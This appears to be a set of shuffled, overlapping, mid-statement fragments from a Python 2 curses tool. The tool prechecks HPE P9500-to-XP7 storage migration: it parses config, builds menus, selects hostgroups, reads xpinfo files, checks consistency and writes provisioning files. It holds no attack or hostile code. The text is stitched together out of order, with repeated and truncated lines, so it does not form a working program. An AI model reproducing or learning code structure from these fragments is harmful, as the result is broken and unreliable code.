"sys.exit(1) for name,value in cfg.items(\"boxpair\"): boxpair_dict[name.upper()] = value.split(\",\") for name,value in cfg.items(\"serialnbr\"): serialnbr_dict[name.upper()]",
"curses.KEY_UP: self.navigate(-1) elif key == curses.KEY_DOWN: self.navigate(1) self.window.clear() self.panel.hide() panel.update_panels() curses.doupdate() class InputMenu(object):",
"after we received the response ### self.update_object.set(self.reply) self.window.clear() self.panel.hide() panel.update_panels() curses.noecho() curses.doupdate() class",
"write_prov = ShowWriteProvisionMenu(menu_win,consistent,map_dir,stdscr) main_menu_items.append((\"Write PROVISION file\",write_prov.display)) main_menu = Menu(menu_win,main_menu_items,stdscr) main_menu.display() ### refresh &",
"if not box_name in hostgroup_dict: hostgroup_dict[box_name] = set() for ldev_nbr in ldev_dict[serial_nbr]: for",
"- self.slice_len def display(self): self.panel.top() self.panel.show() self.window.clear() self.heigth,self.width = self.window.getmaxyx() ### fill the",
"logger.debug(\"XPINFO: known S/N, added to ldev_dict, now at {} elements\".format(len(ldev_dict[serial_nbr]))) else: logger.error(\"XPINFO: line",
"= self.slice_end - self.slice_len def display(self): self.panel.top() self.panel.show() self.window.clear() self.heigth,self.width = self.window.getmaxyx() ###",
">= len(self.filtered_items): self.position = len(self.filtered_items) - 1 logger.debug(\"Select_Menu.navigate :: position = {}, n",
"pairdisplay & check on status #################################################################################################### \"\"\" import curses from curses import panel",
"< 0: self.slice_start = 0 self.slice_end = self.slice_start + self.slice_len elif n >",
"#################################################################################################### ### CLASSES #################################################################################################### class Menu(object): def __init__(self,window,items,stdscr): self.window = window self.heigth,self.width =",
"title self.selection = [] def display(self): self.window.clear() line = \"{} : {}\".format(self.title, \",\".join([\"{}-{}\".format(x[0],x[1])",
"len(line) >= self.width: line = line[:self.width-1] self.window.addstr(1,2,line) self.window.border() self.window.refresh() curses.doupdate() def set(self,search_str): self.search_str",
"self.update() while True: self.window.clear() self.window.refresh() curses.doupdate() for index,item in enumerate(self.filtered_items): if index ==",
"curses.KEY_NPAGE: self.navigate(10) self.window.clear() self.panel.hide() panel.update_panels() curses.doupdate() class Select_XPinfo(object): def __init__(self,window,selection,xpinfo_dir,stdscr): self.window = window",
"### slide slice down ### self.slice_end += n if self.slice_end > len(self.xpinfo_file_list) -",
"= curses.A_NORMAL # line = \"{}: {}\".format(index,item) line = \"{}\".format(item) if len(line) >=",
"sys.stderr(err_msg + \"\\n\") sys.exit(1) if box_name in serialnbr_dict: serial_nbr = serialnbr_dict[box_name] else: err_msg",
"### define menu_win ### menu_win = stdscr.subwin(curses.LINES-13,curses.COLS,3,0) # menu_win.border() main_menu_items = [] input_search",
"log_versions = cfg.getint(\"log\",\"maxversions\") except: log_versions = 5 try: log_dir = cfg.get(\"dir\",\"log\") except: sys.stderr.write(\"log",
"logfile = os.path.join(log_dir,\"xpmig_precheck.log\") logger = logging.getLogger(\"xpmig_precheck\") logger.setLevel(log_level) fh = logging.handlers.RotatingFileHandler(logfile,maxBytes=log_size,backupCount=log_versions) formatter = logging.Formatter(\"%(asctime)s",
"/ StorageTeam VERSION : Based on previous ODR framework 1.0 Initial version 1.1",
"= cfg.get(\"dir\",\"map\") except: sys.stderr.write(\"map file dir not defined, exiting..\\n\") sys.exit(1) serial_to_name_dict = {}",
"= box_dict[box_name].get_hostgroups() for hostgroup_name in hostgroup_name_list: if hostgroup_name not in select_item_dict: select_item_dict[hostgroup_name] =",
"dir not defined, exiting..\\n\") sys.exit(1) try: xpinfo_dir = cfg.get(\"dir\",\"xpinfo\") except: sys.stderr.write(\"xpinfo file dir",
"= 0 self.items = items self.items.append((\"exit\",\"exit\")) def navigate(self,n): self.position += n if self.position",
"out to file for the consistent HOSTGROUPs ? (Y/n)\") key = self.window.getch() if",
"self.selection = selection def update(self): \"\"\" update the list of xpinfo files present",
"cfg.items(\"site\"): site_dict[name.upper()] = value for name,value in cfg.items(\"collect\"): collectfile_dict[name.upper()] = value try: log_level",
"BACK\",curses.A_BOLD) ### define menu_win ### menu_win = stdscr.subwin(curses.LINES-13,curses.COLS,3,0) # menu_win.border() main_menu_items = []",
"and self.slice_end < len(self.xpinfo_file_list) - 1: ### slide slice down ### self.slice_end +=",
"main_menu_items.append((\"Show HOSTGROUPs consistency check results\",hostgroup_consistency.display)) main_menu_items.append((\"Clear HOSTGROUP selection\",selection.clear)) main_menu_items.append((\"Clear consistent HOSTGROUP\",consistent.clear)) write_prov =",
"\"\\n\") sys.exit(1) if box_name in serialnbr_dict: serial_nbr = serialnbr_dict[box_name] else: err_msg = \"No",
"self.search = search def update(self): \"\"\" update the selection items list to match",
"provisioning out to file for the consistent HOSTGROUPs ? (Y/n)\") key = self.window.getch()",
"of xpinfo files present \"\"\" if os.path.exists(self.xpinfo_dir): del(self.xpinfo_file_list[:]) self.xpinfo_file_list = [f for f",
"len(self.display_list) - 1: self.slice_end += n if self.slice_end > len(self.display_list) - 1: self.slice_end",
"in ldev_dict: box_name = serial_to_name_dict[serial_nbr] if not box_name in hostgroup_dict: hostgroup_dict[box_name] = set()",
"elif self.position >= len(self.filtered_items): self.position = len(self.filtered_items) - 1 logger.debug(\"Select_Menu.navigate :: position =",
"self.window.getmaxyx() self.title = title self.consistent = [] def display(self): self.window.clear() line = \"{}:",
"### slide slice down ### self.slice_end += n if self.slice_end > len(self.filtered_items) -",
"selection def update(self): \"\"\" update the list of xpinfo files present \"\"\" if",
": {}\".format(self.title, \",\".join([\"{}-{}\".format(x[0],x[1]) for x in self.selection])) if len(line) >= self.width: line =",
"if self.position < 0: self.position = 0 elif self.position >= len(self.items): self.position =",
"collectfile_dict[name.upper()] = value try: log_level = cfg.getint(\"log\",\"level\") except: log_level = 30 try: log_size",
"box_dict[box_name].test_hostgroup_exists(hostgroup_name): ### TODO: add CA check ### result,report = box_dict[box_name].get_hostgroup_consistency(hostgroup_name) self.display_list.extend(report) if result:",
"in hostgroup_name_list: if hostgroup_name not in select_item_dict: select_item_dict[hostgroup_name] = set() select_item_dict[hostgroup_name].add((box_name,hostgroup_name)) hg_by_name_menu =",
"self.consistent = [] def display(self): self.window.clear() line = \"{}: {}\".format(self.title,\",\".join([\"{}-{}\".format(x[0],x[1]) for x in",
"serialnbr_dict = {} instance_dict = {} site_dict = {} collectfile_dict = {} box_dict",
"TODO: add CA check ### result,report = box_dict[box_name].get_hostgroup_consistency(hostgroup_name) self.display_list.extend(report) if result: self.consistent.add((box_name,hostgroup_name)) logger.info(\"{}-{}",
"site_dict: site = site_dict[box_name] else: err_msg = \"No site defined for box {},",
"self.heigth,self.width = self.window.getmaxyx() ### fill the list to display ### self.display_list = []",
"or PAGE-DOWN> SCROLL DOWN <B> BACK\",curses.A_BOLD) ### define menu_win ### menu_win = stdscr.subwin(curses.LINES-13,curses.COLS,3,0)",
"InputMenu(menu_win,\"Specify new search string\",search,stdscr) main_menu_items.append((\"Set SEARCH string\",input_search.display)) main_menu_items.append((\"Clear SEARCH string\",search.clear)) ### select hostgroups",
"import ConfigParser import sys import os import os.path import csv import string import",
"self.window.border() self.window.refresh() curses.doupdate() def set(self,search_str): self.search_str = search_str self.display() def clear(self): self.search_str =",
"main_menu_items.append((\"Clear SEARCH string\",search.clear)) ### select hostgroups by box ### for boxpair_name in sorted(boxpair_dict.keys()):",
"### # logger.debug(\"SelectMenu.display :: about to addstr line {}\".format(line)) if self.slice_start <= index",
"self.slice_end: self.window.addstr(1+(index-self.slice_start),2,line,mode) key = self.window.getch() if key in [ord(\"b\"),ord(\"B\")]: break elif key in",
"< 0: if self.position - self.slice_start < 2 and self.slice_start >= 1: ###",
"boxpair_dict[boxpair_name]: hostgroup_name_list = box_dict[box_name].get_hostgroups() for hostgroup_name in hostgroup_name_list: if hostgroup_name not in select_item_dict:",
"started\") logger.info(\"#\" * linelen) logger.info(\"Configuration settings :\") logger.info(\"BOXPAIR :\") logger.info(boxpair_dict) logger.info(\"SERIAL NBRs:\") logger.info(serialnbr_dict)",
": HPE XP7 Migration, Precheck DESCRIPTION : Precheck to examine hostgroup is ready",
"== curses.KEY_NPAGE: self.navigate(10) self.window.clear() self.panel.hide() panel.update_panels() curses.doupdate() class ShowConsistencyMenu(object): def __init__(self,window,selection,consistent,stdscr): self.window =",
"= Select_Menu(menu_win,select_item_dict,selection,search,stdscr) main_menu_items.append((\"Select by HOSTGROUP\",hg_by_name_menu.display)) ### read XPINFO file ### xpinfo_menu = Select_XPinfo(menu_win,selection,xpinfo_dir,stdscr)",
"check update 2.1 Add xpinfo file processing CONFIG : xpmig.ini LOG : xpmig_precheck.log",
"1 def display(self): self.panel.top() self.panel.show() self.window.clear() while True: self.window.refresh() curses.doupdate() for index,item in",
"Migration, Precheck DESCRIPTION : Precheck to examine hostgroup is ready for migration AUTHOR",
"if hostgroup_name not in select_item_dict: select_item_dict[hostgroup_name] = set() select_item_dict[hostgroup_name].add((box_name,hostgroup_name)) hg_by_box_menu = Select_Menu(menu_win,select_item_dict,selection,search,stdscr) main_menu_items.append((\"Select",
"current_set = set(self.selection) current_set.add(item) self.selection = list(sorted(current_set)) self.display() def clear(self): del self.selection[:] self.display()",
"PRECHECK started\") logger.info(\"#\" * linelen) logger.info(\"Configuration settings :\") logger.info(\"BOXPAIR :\") logger.info(boxpair_dict) logger.info(\"SERIAL NBRs:\")",
"str {}\".format(self.search.get())) self.filtered_items = [x for x in self.items.keys() if re.search(self.search.get(),x,flags=re.IGNORECASE)] else: logger.debug(\"Select_Menu.update",
"logger.debug(\"XPINFO processing: adding {}-{} to the selection\".format(box_name,hostgroup_name)) self.selection.add((box_name,hostgroup_name)) elif key == curses.KEY_UP: self.navigate(-1)",
"update the selection items list to match the new search criteria \"\"\" if",
"the items which fits in the window ### self.slice_start = 0 self.slice_len =",
"version 1.1 Curses menu structure added 1.2 Add search term criteria 1.3 Add",
"= 30 try: log_size = cfg.getint(\"log\",\"maxsize\") except: log_size = 100000000 try: log_versions =",
"by HOSTGROUP\",hg_by_name_menu.display)) ### read XPINFO file ### xpinfo_menu = Select_XPinfo(menu_win,selection,xpinfo_dir,stdscr) main_menu_items.append((\"Read XPINFO file\",xpinfo_menu.display))",
"what to display ### self.slice_start = 0 self.slice_len = min(len(self.display_list),self.heigth-6) self.slice_end = self.slice_start",
"else: sel_item = hba_wwn.nickname if \"{}-{}\".format(box_name,sel_item) not in select_item_dict: select_item_dict[\"{}-{}\".format(box_name,sel_item)] = set() select_item_dict[\"{}-{}\".format(box_name,sel_item)].add((box_name,hostgroup_name))",
"main_menu_items.append((\"Clear consistent HOSTGROUP\",consistent.clear)) write_prov = ShowWriteProvisionMenu(menu_win,consistent,map_dir,stdscr) main_menu_items.append((\"Write PROVISION file\",write_prov.display)) main_menu = Menu(menu_win,main_menu_items,stdscr) main_menu.display()",
"box_dict[box_name].get_ldev_hostgroups(ldev_nbr): hostgroup_dict[box_name].add(hostgroup_name) ### add found hostgroups to the selection ### for box_name in",
"set(self,search_str): self.search_str = search_str self.display() def clear(self): self.search_str = \"\" self.display() def get(self):",
"name,value in cfg.items(\"boxpair\"): boxpair_dict[name.upper()] = value.split(\",\") for name,value in cfg.items(\"serialnbr\"): serialnbr_dict[name.upper()] = int(value)",
"self.window.clear() self.panel.hide() panel.update_panels() curses.doupdate() class Select_Menu(object): def __init__(self,window,items,selection,search,stdscr): self.window = window self.heigth,self.width =",
"nbr defined for box {}, exiting..\".format(box_name) logger.error(err_msg) sys.stderr(err_msg + \"\\n\") sys.exit(1) if box_name",
"sys.stderr(\"{} section missing in config file {}, exiting..\".format(mandatory_section,configfile)) sys.exit(1) for name,value in cfg.items(\"boxpair\"):",
"= logging.Formatter(\"%(asctime)s %(levelname)s %(message)s\",\"%Y/%m/%d-%H:%M:%S\") fh.setFormatter(formatter) logger.addHandler(fh) logger.info(\"#\" * linelen) logger.info(\"XPMIG PRECHECK started\") logger.info(\"#\"",
"not defined, exiting..\\n\") sys.exit(1) try: map_dir = cfg.get(\"dir\",\"map\") except: sys.stderr.write(\"map file dir not",
"self.slice_end = len(self.display_list) - 1 self.slice_start = self.slice_end - self.slice_len def display(self): self.panel.top()",
"else: logger.error(\"{}-{} not added to consistent hostgroup list during consistency check\".format(box_name,hostgroup_name)) else: logger.debug(\"{}-{}",
"= InputMenu(menu_win,\"Specify new search string\",search,stdscr) main_menu_items.append((\"Set SEARCH string\",input_search.display)) main_menu_items.append((\"Clear SEARCH string\",search.clear)) ### select",
"box_name in collectfile_dict: collect_file = os.path.join(collect_dir,collectfile_dict[box_name]) if box_name in instance_dict: instance_nbr = instance_dict[box_name]",
"serial_to_name_dict = {} for box_name,serial_nbr in serialnbr_dict.items(): serial_to_name_dict[serial_nbr] = box_name ##################### ### start",
"Add search term criteria 1.3 Add config file 2.0 Consistency check update 2.1",
"self.window.keypad(1) self.panel = panel.new_panel(self.window) self.panel.hide() panel.update_panels() self.display_list = [] def navigate(self,n): if n",
"stdscr.subwin(1,curses.COLS,curses.LINES-1,0) #key_win.clear() #key_win.refresh() #curses.doupdate() key_win.addstr(0,2,\"<ARROW-UP or PAGE-UP> SCROLL UP <ARROW-DOWN or PAGE-DOWN> SCROLL",
"in hostgroup_dict: for hostgroup_name in hostgroup_dict[box_name]: logger.debug(\"XPINFO processing: adding {}-{} to the selection\".format(box_name,hostgroup_name))",
"cfg.getint(\"log\",\"maxsize\") except: log_size = 100000000 try: log_versions = cfg.getint(\"log\",\"maxversions\") except: log_versions = 5",
"= window self.heigth,self.width = self.window.getmaxyx() self.window.keypad(1) self.panel = panel.new_panel(self.window) self.panel.hide() panel.update_panels() self.position =",
"with open(sf,\"wt\") as sfh: box_dict[box_name].print_provisioning(hostgroup_name,sfh) self.window.addstr(2,2,\"Written..\") else: self.window.addstr(2,2,\"Cancelled..\") self.window.clear() self.panel.hide() panel.update_panels() curses.doupdate() class",
"if self.position < 0: self.position = 0 elif self.position >= len(self.xpinfo_file_list): self.position =",
"### search_win = stdscr.subwin(3,curses.COLS,curses.LINES-10,0) search = Search(search_win,\"Display HOSTGROUPS matching this SEARCH expression\",stdscr) search.display()",
"self.panel.show() self.window.clear() self.window.addstr(1,2,\"Write provisioning out to file for the consistent HOSTGROUPs ? (Y/n)\")",
"ready for migration AUTHOR : <NAME> / StorageTeam VERSION : Based on previous",
"add generate temporary horcm file and daemon to pairdisplay & check on status",
"= map_dir self.window.keypad(1) self.panel = panel.new_panel(self.window) self.panel.hide() panel.update_panels() def display(self): self.panel.top() self.panel.show() self.window.clear()",
"title_win.border() ### define search_win ### search_win = stdscr.subwin(3,curses.COLS,curses.LINES-10,0) search = Search(search_win,\"Display HOSTGROUPS matching",
"\"\" self.display() def get(self): return self.search_str class Consistent(object): def __init__(self,window,title,stdscr): self.window = window",
"self.width: line = line[:self.width-1] self.window.addstr(1,2,line) curses.echo() self.window.refresh() curses.doupdate() self.reply = self.window.getstr() ### after",
"wait ### stdscr.refresh() stdscr.getkey() #################### ### parse config ### #################### configfile = \"xpmig.ini\"",
"instance_dict: instance_nbr = instance_dict[box_name] else: err_msg = \"No HORCM instance nbr defined for",
"= 0 self.selection = selection self.search = search def update(self): \"\"\" update the",
"selection\",selection.clear)) main_menu_items.append((\"Clear consistent HOSTGROUP\",consistent.clear)) write_prov = ShowWriteProvisionMenu(menu_win,consistent,map_dir,stdscr) main_menu_items.append((\"Write PROVISION file\",write_prov.display)) main_menu = Menu(menu_win,main_menu_items,stdscr)",
"self.filtered_items.append(\"exit\") self.slice_start = 0 self.slice_end = self.slice_start + self.slice_len self.position = 0 def",
"= 0 self.slice_end = self.slice_start + self.slice_len logger.debug(\"Select_Menu.navigate :: slide slice up to",
"= 0 elif self.position >= len(self.items): self.position = len(self.items) - 1 def display(self):",
"__init__(self,window,items,stdscr): self.window = window self.heigth,self.width = self.window.getmaxyx() self.window.keypad(1) self.panel = panel.new_panel(self.window) self.panel.hide() panel.update_panels()",
"xpinfo files ### for index,item in enumerate(self.xpinfo_file_list): if index == self.position: mode =",
"device_name = row[1] ldev_nbr = xp7.standard_format_ldev(row[5]) serial_nbr = int(row[8]) logger.debug(\"XPINFO: got S/N {}",
"fh.setFormatter(formatter) logger.addHandler(fh) logger.info(\"#\" * linelen) logger.info(\"XPMIG PRECHECK started\") logger.info(\"#\" * linelen) logger.info(\"Configuration settings",
"line = \"{}: {}\".format(self.title,\",\".join([\"{}-{}\".format(x[0],x[1]) for x in self.consistent])) if len(line) >= self.width: line",
"self.slice_start >= 1: ### slide slice up ### self.slice_start += n if self.slice_start",
"instance nbr defined for box {}, exiting..\".format(box_name) logger.error(err_msg) sys.stderr(err_msg + \"\\n\") sys.exit(1) if",
"1: self.slice_end = len(self.xpinfo_file_list) - 1 self.slice_start = self.slice_end - self.slice_len def display(self):",
"self.window.clear() self.panel.hide() panel.update_panels() curses.noecho() curses.doupdate() class Selection(object): def __init__(self,window,title,stdscr): self.window = window self.heigth,self.width",
"line[:self.width-1] self.window.addstr(1,2,line) self.window.border() self.window.refresh() curses.doupdate() def add(self,item): current_set = set(self.selection) current_set.add(item) self.selection =",
"the list to display ### self.display_list = [] for box_name,hostgroup_name in self.selection.get(): self.display_list.extend(box_dict[box_name].get_hostgroup_noluns(hostgroup_name))",
"display ### self.display_list = [] for box_name,hostgroup_name in self.selection.get(): if box_dict[box_name].test_hostgroup_exists(hostgroup_name): ### TODO:",
"current_set.add(item) self.selection = list(sorted(current_set)) self.display() def clear(self): del self.selection[:] self.display() def get(self): return",
"width ### if curses.COLS < 20 or curses.LINES < 20: sys.stderr.write(\"Window not large",
"else: err_msg = \"No serial nbr defined for box {}, exiting..\".format(box_name) logger.error(err_msg) sys.stderr(err_msg",
"if curses.COLS < 20 or curses.LINES < 20: sys.stderr.write(\"Window not large enough, exiting",
"if len(line) >= self.width: line = line[:self.width-1] self.window.addstr(1+index,2,line,mode) key = self.window.getch() if key",
"{} for serial_nbr in serial_nbr_set: ldev_dict[serial_nbr] = set() ### process the selected xpinfo",
"hg_by_host_menu = Select_Menu(menu_win,select_item_dict,selection,search,stdscr) main_menu_items.append((\"Select by HOSTNAME\",hg_by_host_menu.display)) ### select hostgroups by name ### select_item_dict",
"update(self): \"\"\" update the list of xpinfo files present \"\"\" if os.path.exists(self.xpinfo_dir): del(self.xpinfo_file_list[:])",
"curses.KEY_NPAGE: self.navigate(10) self.window.clear() self.panel.hide() panel.update_panels() curses.doupdate() class ShowConsistencyMenu(object): def __init__(self,window,selection,consistent,stdscr): self.window = window",
"key == curses.KEY_NPAGE: self.navigate(10) self.window.clear() self.panel.hide() panel.update_panels() curses.doupdate() class ShowWriteProvisionMenu(object): def __init__(self,window,consistent,map_dir,stdscr): self.window",
"self.navigate(10) self.window.clear() self.panel.hide() panel.update_panels() curses.doupdate() class Select_XPinfo(object): def __init__(self,window,selection,xpinfo_dir,stdscr): self.window = window self.heigth,self.width",
"to ldev_dict, now at {} elements\".format(len(ldev_dict[serial_nbr]))) else: logger.error(\"XPINFO: line too short to be",
"HOSTGROUP selection\",selection.clear)) main_menu_items.append((\"Clear consistent HOSTGROUP\",consistent.clear)) write_prov = ShowWriteProvisionMenu(menu_win,consistent,map_dir,stdscr) main_menu_items.append((\"Write PROVISION file\",write_prov.display)) main_menu =",
"= self.window.getmaxyx() ### fill the list to display ### self.display_list = [] for",
"{} site_dict = {} collectfile_dict = {} box_dict = {} #################################################################################################### ### FUNCTIONS",
"if result: self.consistent.add((box_name,hostgroup_name)) logger.info(\"{}-{} added to consistent hostgroup list during consistency check\".format(box_name,hostgroup_name)) else:",
"- 1 self.slice_start = self.slice_end - self.slice_len def display(self): self.panel.top() self.panel.show() self.window.clear() self.heigth,self.width",
"display ### self.display_list = [] for box_name,hostgroup_name in self.selection.get(): self.display_list.extend(box_dict[box_name].get_hostgroup_noluns(hostgroup_name)) ### now we",
"slice is a view on the items which fits in the window ###",
"### start logging ### ##################### logfile = os.path.join(log_dir,\"xpmig_precheck.log\") logger = logging.getLogger(\"xpmig_precheck\") logger.setLevel(log_level) fh",
"### select_item_dict = {} for boxpair_name in sorted(boxpair_dict.keys()): for box_name in boxpair_dict[boxpair_name]: hostgroup_name_list",
"= line[:self.width-1] self.window.addstr(1,2,line) self.window.border() self.window.refresh() curses.doupdate() def add(self,item): current_set = set(self.selection) current_set.add(item) self.selection",
"= self.slice_start + self.slice_len self.position = 0 def navigate(self,n): self.position += n if",
"__init__(self,window,selection,stdscr): self.window = window self.heigth,self.width = self.window.getmaxyx() self.selection = selection self.hostgroup_summary = []",
"select_item_dict[hostgroup_name].add((box_name,hostgroup_name)) hg_by_box_menu = Select_Menu(menu_win,select_item_dict,selection,search,stdscr) main_menu_items.append((\"Select {} HOSTGROUP\".format(boxpair_name),hg_by_box_menu.display)) ### select hostgroups by host (hba_wwn)",
"box_name in site_dict: site = site_dict[box_name] else: err_msg = \"No site defined for",
"self.position = 0 self.xpinfo_dir = xpinfo_dir self.selection = selection def update(self): \"\"\" update",
"logging.handlers.RotatingFileHandler(logfile,maxBytes=log_size,backupCount=log_versions) formatter = logging.Formatter(\"%(asctime)s %(levelname)s %(message)s\",\"%Y/%m/%d-%H:%M:%S\") fh.setFormatter(formatter) logger.addHandler(fh) logger.info(\"#\" * linelen) logger.info(\"XPMIG PRECHECK",
"set(self.consistent) current_set.add(item) self.consistent = list(sorted(current_set)) self.display() def clear(self): del self.consistent[:] self.display() def get(self):",
"logger.debug(\"SelectMenu.display :: index in slice {} - {}, executing addstr\".format(self.slice_start,self.slice_end)) self.window.addstr(1+(index-self.slice_start),2,line,mode) key =",
"hostgroup_dict = {} for serial_nbr in serial_nbr_set: ldev_dict[serial_nbr] = set() ### process the",
":: about to addstr line {}\".format(line)) if self.slice_start <= index <= self.slice_end: #",
"0 self.window.keypad(1) self.panel = panel.new_panel(self.window) self.panel.hide() panel.update_panels() self.position = 0 self.xpinfo_dir = xpinfo_dir",
"ShowConsistencyMenu(object): def __init__(self,window,selection,consistent,stdscr): self.window = window self.selection = selection self.window.keypad(1) self.panel = panel.new_panel(self.window)",
"{}\".format(self.xpinfo_file_list[self.position])) serial_nbr_set = set(serialnbr_dict.values()) ldev_dict = {} hostgroup_dict = {} for serial_nbr in",
"main_menu = Menu(menu_win,main_menu_items,stdscr) main_menu.display() ### refresh & wait ### stdscr.refresh() stdscr.getkey() #################### ###",
"cfg.items(\"collect\"): collectfile_dict[name.upper()] = value try: log_level = cfg.getint(\"log\",\"level\") except: log_level = 30 try:",
"else: logger.debug(\"XPINFO: start processing {}\".format(self.xpinfo_file_list[self.position])) serial_nbr_set = set(serialnbr_dict.values()) ldev_dict = {} hostgroup_dict =",
"self.panel.show() self.window.clear() self.heigth,self.width = self.window.getmaxyx() ### fill the list to display ### self.display_list",
"import logging import logging.handlers import copy from ConfigParser import ConfigParser import sys import",
"<reponame>kschets/XP_migrator<gh_stars>1-10 #!/usr/bin/python \"\"\" #################################################################################################### TITLE : HPE XP7 Migration, Precheck DESCRIPTION : Precheck",
"self.window.getmaxyx() self.xpinfo_file_list =[] self.slice_start = 0 self.slice_len = 0 self.slice_end = 0 self.window.keypad(1)",
"1: ### slide slice up ### self.slice_start += n if self.slice_start < 0:",
"self.consistent class ShowSummaryMenu(object): def __init__(self,window,selection,stdscr): self.window = window self.heigth,self.width = self.window.getmaxyx() self.selection =",
"too short to be valid, skipping {}\".format(row)) ### translate ldev to hostgroup ###",
"exists\".format(box_name,hostgroup_name)) ### now we know what to display ### self.slice_start = 0 self.slice_len",
"search_win ### search_win = stdscr.subwin(3,curses.COLS,curses.LINES-10,0) search = Search(search_win,\"Display HOSTGROUPS matching this SEARCH expression\",stdscr)",
"== self.position: mode = curses.A_STANDOUT else: mode = curses.A_NORMAL line = \"{}\".format(item) if",
"XP7 MIGRATION PRE-CHECK\") title_win.border() ### define search_win ### search_win = stdscr.subwin(3,curses.COLS,curses.LINES-10,0) search =",
"box_dict[box_name].get_hostgroups() for hostgroup_name in hostgroup_name_list: hba_wwn_list = box_dict[box_name].get_hostgroup_hba_wwns(hostgroup_name) for hba_wwn in hba_wwn_list: if",
"### title_win = stdscr.subwin(3,curses.COLS,0,0) title_win.addstr(1,2,\"HPE P9500 TO XP7 MIGRATION PRE-CHECK\") title_win.border() ### define",
"line[:self.width-1] self.window.addstr(1,2,line) curses.echo() self.window.refresh() curses.doupdate() self.reply = self.window.getstr() ### after we received the",
"refresh & wait ### stdscr.refresh() stdscr.getkey() #################### ### parse config ### #################### configfile",
"the selection\".format(box_name,hostgroup_name)) self.selection.add((box_name,hostgroup_name)) elif key == curses.KEY_UP: self.navigate(-1) elif key == curses.KEY_DOWN: self.navigate(1)",
"if len(line) >= self.width: line = line[:self.width-1] ### only add lines in the",
"by host (hba_wwn) ### select_item_dict = {} for boxpair_name in sorted(boxpair_dict.keys()): for box_name",
"instance_dict[box_name] else: err_msg = \"No HORCM instance nbr defined for box {}, exiting..\".format(box_name)",
"self.window.clear() line = \"{} : {}\".format(self.title, \",\".join([\"{}-{}\".format(x[0],x[1]) for x in self.selection])) if len(line)",
"def navigate(self,n): if n < 0: if self.slice_start >= 1: self.slice_start += n",
"+= n if self.slice_end > len(self.filtered_items) - 1: self.slice_end = len(self.filtered_items) - 1",
"is a dict ### self.items = items self.filtered_items = copy.copy(self.items.keys()) self.filtered_items.append(\"exit\") ### slice",
"\"\"\" #################################################################################################### TITLE : HPE XP7 Migration, Precheck DESCRIPTION : Precheck to examine",
"mode = curses.A_NORMAL # line = \"{}: {}\".format(index,item[0]) line = \"{}\".format(item[0]) if len(line)",
"\"{}: {}\".format(index,item) line = \"{}\".format(item) if len(line) >= self.width: line = line[:self.width-1] ###",
"self.navigate(-10) elif key == curses.KEY_NPAGE: self.navigate(10) self.window.clear() self.panel.hide() panel.update_panels() curses.doupdate() class Select_XPinfo(object): def",
"from ConfigParser import ConfigParser import sys import os import os.path import csv import",
"\"\" self.update_object = upd_obj def display(self): self.panel.top() self.panel.show() self.window.clear() line = \"{}: \".format(self.text)",
"in config file {}, exiting..\".format(mandatory_section,configfile)) sys.exit(1) for name,value in cfg.items(\"boxpair\"): boxpair_dict[name.upper()] = value.split(\",\")",
"Precheck to examine hostgroup is ready for migration AUTHOR : <NAME> / StorageTeam",
"instantiate boxes ### ######################### for box_name in collectfile_dict: collect_file = os.path.join(collect_dir,collectfile_dict[box_name]) if box_name",
"self.slice_len = 0 self.slice_end = 0 self.window.keypad(1) self.panel = panel.new_panel(self.window) self.panel.hide() panel.update_panels() self.position",
"= hba_wwn.nickname.split(\"_\")[0] else: sel_item = hba_wwn.nickname if \"{}-{}\".format(box_name,sel_item) not in select_item_dict: select_item_dict[\"{}-{}\".format(box_name,sel_item)] =",
"ldev_dict = {} hostgroup_dict = {} for serial_nbr in serial_nbr_set: ldev_dict[serial_nbr] = set()",
"xpmig_precheck.log TODO : add generate temporary horcm file and daemon to pairdisplay &",
"self.window.keypad(1) self.panel = panel.new_panel(self.window) self.panel.hide() panel.update_panels() self.text = text self.reply = \"\" self.update_object",
"break elif key in [curses.KEY_ENTER,ord(\"\\n\")]: if self.position == len(self.filtered_items) - 1: break else:",
"display(self): self.panel.top() self.panel.show() self.window.clear() self.window.addstr(1,2,\"Write provisioning out to file for the consistent HOSTGROUPs",
"self.items.append((\"exit\",\"exit\")) def navigate(self,n): self.position += n if self.position < 0: self.position = 0",
"cfg.getint(\"log\",\"level\") except: log_level = 30 try: log_size = cfg.getint(\"log\",\"maxsize\") except: log_size = 100000000",
"self.slice_start = self.slice_end - self.slice_len def display(self): self.panel.top() self.panel.show() self.window.clear() self.heigth,self.width = self.window.getmaxyx()",
"or curses.LINES < 20: sys.stderr.write(\"Window not large enough, exiting ..\\n\") sys.exit(1) ### define",
"not exists\".format(box_name,hostgroup_name)) ### now we know what to display ### self.slice_start = 0",
"the list of xpinfo files present \"\"\" if os.path.exists(self.xpinfo_dir): del(self.xpinfo_file_list[:]) self.xpinfo_file_list = [f",
"added to consistent hostgroup list during consistency check\".format(box_name,hostgroup_name)) else: logger.error(\"{}-{} not added to",
"boxpair_dict[boxpair_name]: hostgroup_name_list = box_dict[box_name].get_hostgroups() for hostgroup_name in hostgroup_name_list: hba_wwn_list = box_dict[box_name].get_hostgroup_hba_wwns(hostgroup_name) for hba_wwn",
"elif key == curses.KEY_UP: self.navigate(-1) elif key == curses.KEY_DOWN: self.navigate(1) self.window.clear() self.panel.hide() panel.update_panels()",
"### select hostgroups by host (hba_wwn) ### select_item_dict = {} for boxpair_name in",
"logger.info(\"SERIAL NBRs:\") logger.info(serialnbr_dict) logger.info(\"INSTANCE NBRs:\") logger.info(instance_dict) logger.info(\"SITE NBRs:\") logger.info(site_dict) logger.info(\"COLLECT FILEs:\") logger.info(collectfile_dict) logger.info(\"XPINFO",
"self.slice_end += n if self.slice_end > len(self.display_list) - 1: self.slice_end = len(self.display_list) -",
"in cfg.items(\"serialnbr\"): serialnbr_dict[name.upper()] = int(value) for name,value in cfg.items(\"instance\"): instance_dict[name.upper()] = int(value) for",
"curses.KEY_PPAGE: self.navigate(-10) elif key == curses.KEY_NPAGE: self.navigate(10) self.window.clear() self.panel.hide() panel.update_panels() curses.doupdate() class ShowConsistencyMenu(object):",
"n if self.slice_end > len(self.xpinfo_file_list) - 1: self.slice_end = len(self.xpinfo_file_list) - 1 self.slice_start",
"items self.items.append((\"exit\",\"exit\")) def navigate(self,n): self.position += n if self.position < 0: self.position =",
"dir: {}\".format(xpinfo_dir)) ######################### ### instantiate boxes ### ######################### for box_name in collectfile_dict: collect_file",
"self.slice_start + self.slice_len elif n > 0: if self.slice_end < len(self.display_list) - 1:",
"1: self.slice_end = len(self.display_list) - 1 self.slice_start = self.slice_end - self.slice_len def display(self):",
